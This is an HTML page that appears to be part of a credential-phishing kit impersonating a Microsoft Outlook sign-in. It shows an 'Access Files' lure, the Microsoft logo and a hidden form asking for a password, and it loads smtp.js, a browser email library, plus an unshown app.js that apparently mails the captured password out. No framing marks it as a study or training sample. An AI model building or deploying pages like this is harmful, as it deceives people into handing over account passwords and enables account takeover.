<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.9/dist/css/bootstrap.min.css">
  <!-- <title>Outlook Login</title> -->

  <style>
    body {
      /* background-color: #f5f5f5; */
      box-sizing: border-box;
      font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
      align-items: center;
      flex-direction: column;
    }

    * {
      margin: 0;
      padding: 0;
    }

    nav {
      background-color: white;
      padding: 10px 0;
      padding-left: 60px;
    }

    section {
      /* background-image: url(asset/photo-1624571395775-253d9666612b.jpg); */
      height: 95vh;
      background-size: cover;
      background-repeat: no-repeat;
      display: grid;
      align-items: center;
      text-align: center;
    }

    .image {
      max-width: 700px;
      margin: auto;
    }

    section img {
      width: 100%;
      margin: auto;
    }

    .container {
      height: 85vh;
      display: flex;
      position: fixed;
      z-index: 90;
      background-color: rgba(55, 53, 51, 0.188);
      display: none;

      position: absolute;
      top: 0;
      width: 100%;  
      height: 100%;

    }

    .card {
      width: 440px;
      margin: auto auto;
      padding: 0;
      /* border: 1px solid #ccc; */
      padding: 44px; 
      box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 6px 0px;
      vertical-align: center;
      background-color: white;      
    }

    .text-input {
      width: 100%;
      height: 44px;
      padding: 8px 12px;
      padding-left: 0;
      border: none;
      border-bottom: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
      margin-bottom: 16px;
      margin-top: 10px;
      font-size: 16px;
      font-weight: 300;
      outline: none;
    }

    h2 {
      margin-top: 10px;
      margin-bottom: 5px;
    }

    p {
      font-size: 14px;
    }

    p a {
      text-decoration: none;
      color: rgb(0, 108, 184)
    }

    .btn {
      color: rgb(255 255 255);
      border-color: rgb(0 108 184);
      background-color: rgb(0 103 184);
      padding: 8px 26px;
      text-decoration: none;
      display: inline-block;
    }

    .user-email {
      display: flex;
      align-items: center;
    }

    .access-btn {
      padding: 10px 20px;
      color: white;
      background-color: rgb(10, 108, 183);
      font-weight: 500;
      font-size: 20px;
    }
    
  </style>
</head>

<body>
  <main>
    <nav>
      <img src="asset/loo.jpg" alt="">
    </nav>

    <section>
      <div class="image image-btns">
       <h1 class="access-btn">Access Files </h1>
      </div>
    </section>
  </main>
  

  <!-- Form Container -->
  <div class="container close">
    <div class="card">
      <div class="logo">
        <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.534-.255,2.646,2.646,0,0,0-.852-.12,1.808,1.808,0,0,0-1.448.722,3.467,3.467,0,0,0-.592,2.223V18.4H60.525V8.507h2.329v1.559h.038A2.729,2.729,0,0,1,63.855,8.8,2.611,2.611,0,0,1,65.4,8.343m1,5.254A5.358,5.358,0,0,1,67.792,9.71a5.1,5.1,0,0,1,3.85-1.434,4.742,4.742,0,0,1,3.623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-3.772,1.424,4.935,4.935,0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852,3.707,3.707,0,0,0-.707,2.43m11.2-2.416a1,1,0,0,0,.318.785,5.426,5.426,0,0,0,1.4.717,4.767,4.767,0,0,1,1.959,1.256,2.6,2.6,0,0,1,.563,1.689A2.715,2.715,0,0,1,83.2,17.794a4.558,4.558,0,0,1-2.9.847,6.978,6.978,0,0,1-1.362-.149,6.047,6.047,0,0,1-1.265-.38v-2.29a5.733,5.733,0,0,0,1.367.7,4,4,0,0,0,1.328.26,2.365,2.365,0,0,0,1.164-.221.79.79,0,0,0,.375-.741,1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,0,0,1,86.664,9.71a5.1,5.1,0,0,1,3.849-1.434,4.743,4.743,0,0,1,3.624,1.381,5.212,5.212,0,0,1,1.3,3.729,5.259,5.259,0,0,1-1.386,3.83,5.02,5.02,0,0,1-3.773,1.424,4.934,4.934,0,0,1-3.652-1.352A4.987,4.987,0,0,1,85.278,13.6m2.425-.077a3.537,3.537,0,0,0,.7,2.368,2.506,2.506,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.39,2.39,0,0,0-1.93-.813,2.439,2.439,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.107,0,0,0-.664-.1,1.407,1.407,0,0,0-1.126.457A2.017,2.017,0,0,0,99.7,7.313V8.507h3.469V6.283l2.339-.712V8.507h2.358v1.906h-2.358v4.629a1.951,1.951,0,0,0,.332,1.29,1.326,1.326,0,0,0,1.044.375,1.557,1.557,0,0,0,.486-.1,2.294,2.294,0,0,0,.5-.231V18.3a2.737,2.737,0,0,1-.736.231,5.029,5.029,0,0,1-1.015.106,2.887,2.887,0,0,1-2.209-.784,3.341,3.341,0,0,1-.736-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
      </div>
  
      <div class="user-email">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
        <p class="emailText">Email</p>
      </div>
      
  
      <!-- <h2 class="prompt">Enter Password</h2> -->
  
      <form action="" id="formm">
        <input type="password" id="text-input" class="text-input" placeholder="Enter Password">
  
        <!-- <p class="small-info"><a href="">Forgotten your password?</a></p> -->
  
        <div class="btn-container" style="text-align: right; margin-top: 20px;">
          <input class="btn" id="js-btn" type="submit" value="Submit">
          <!-- <a class="btn" id="js-btn">Sign In</a> -->
        </div>

      </form>
    </div>
    
  </div>

  <div class="footer" style="text-align: right; padding-right: 16px; font-size: 13px;">
    <p>Terms of use Privacy & cookies</p>
  </div>

  <script src="https://smtpjs.com/v3/smtp.js"></script>
  <script src="app.js"></script>

</body>
</html>